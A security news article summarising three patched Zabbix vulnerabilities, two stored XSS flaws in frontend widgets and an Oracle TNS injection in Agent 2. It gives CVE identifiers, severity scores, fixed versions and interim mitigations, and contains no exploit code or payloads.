Ddos 
Zabbix, the ubiquitous open-source monitoring solution used by enterprises to track the health of vast IT infrastructures, has released a series of security patches to address three significant vulnerabilities. These flaws, which impact the Zabbix Frontend and Agent 2, could allow authenticated attackers to execute malicious scripts or hijack database connections, potentially turning a trusted monitoring tool into a platform for further network compromise.
The most severe issues involve Stored Cross-Site Scripting (XSS), where a malicious payload is saved directly onto the server and executed by unsuspecting administrators.
The first high-severity vulnerability (CVE-2026-23926, CVSS 7.3) targets the Host navigator widget. Researchers discovered that an authenticated administrator—even one without “super” privileges—can create a maintenance period containing a hidden JavaScript payload.
The danger lies in the widget’s tooltip functionality. As the advisory explains, “An authenticated (non-super) administrator can create a maintenance period with a JavaScript payload that is executed by any user that opens tooltip for that maintenance period in the Host navigator widget”.
This allows an attacker to perform unauthorized actions on behalf of any other user who views the monitoring dashboard, potentially escalating their own privileges or exfiltrating sensitive configuration data.
A second high-severity XSS flaw (CVE-2026-23928, CVSS 7.3) was identified in the Item history/Plain text widget. In this scenario, the threat comes from the monitored hosts themselves. If a host is compromised, it can send a malicious JavaScript payload to the Zabbix server.
When an administrator views that host’s history through the Plain text widget, the script is executed by their browser. This “cross-site” attack effectively bridges the gap between a monitored endpoint and the central monitoring authority.
Moving from the frontend to the backend, Zabbix also addressed a “Medium” severity injection flaw (CVE-2026-23927) in Agent 2. The vulnerability exists in the Oracle plugin, where the service parameter fails to properly sanitize input.
An attacker capable of sending requests to Agent 2 can inject a malicious Oracle TNS connection string. This can force the agent to connect to an attacker-controlled server, leading to the “leaking of Oracle database credentials” if they are stored in a named session.
| CVE ID | Severity | Component | Fixed Versions |
| CVE-2026-23926 | 7.3 (High) | Frontend (Host Navigator) |
7.0.24, 7.4.8 |
| CVE-2026-23928 | 7.3 (High) | Frontend (Item History) |
6.0.45, 7.0.24, 7.4.8 |
| CVE-2026-23927 | 5.1 (Medium) | Agent 2 (Oracle Plugin) |
Update Recommended |
The Zabbix team recommends updating all affected components to their respective fixed versions immediately.
If an immediate update is not possible, administrators should consider:
- Disabling the Host navigator widget via the Modules menu.
- Disabling HTML display in the Item history/Plain text widget or disabling the widget entirely.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
